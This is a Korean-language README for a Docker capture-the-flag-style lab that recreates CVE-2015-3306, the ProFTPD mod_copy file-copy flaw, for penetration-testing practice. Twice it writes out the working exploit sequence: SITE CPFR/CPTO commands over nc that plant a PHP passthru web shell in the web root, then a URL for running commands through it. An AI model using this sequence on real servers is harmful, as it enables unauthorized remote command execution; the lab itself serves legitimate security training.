
CVE-2015-3306 - ProFTPD - 레드팀 또는 모의 침투 테스트에 사용하기 쉬운 RCE 홈랩 구성(Docker)
이 랩은 CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE 취약점을 시뮬레이션하도록 설계되었습니다.
ProFTPD의 mod_copy 모듈을 통한 웹 셸 삽입 RCE(Web Shell Injection RCE) 학습에 사용됩니다.
mod_copy 완전 활성화 (SITE CPFR / SITE CPTO)/var/www/html 시뮬레이션을 위한 Apache2 + PHP5flag_RANDOM.txt 자동 생성/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
웹 브라우저로 열기:
http://<IP>/webshell.php?cmd=<command>
저장 위치:
/tmp/flag_RANDOM.txt
이 랩은 mod_copy가 활성화된 ProFTPD 1.3.5를 사용하여 CVE-2015-3306을 시뮬레이션하며, 공격자가 **ProFTPD mod_copy 원격 파일 복사 후 RCE(Remote File Copy to RCE)**를 수행할 수 있게 합니다.
mod_copy 활성화 (SITE CPFR + SITE CPTO)flag_RANDOM.txtnc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
그런 다음 실행:
http://<IP>/webshell.php?cmd=<command>
/tmp/flag_RANDOM.txt
교육 및 승인된 침투 테스트 전용입니다.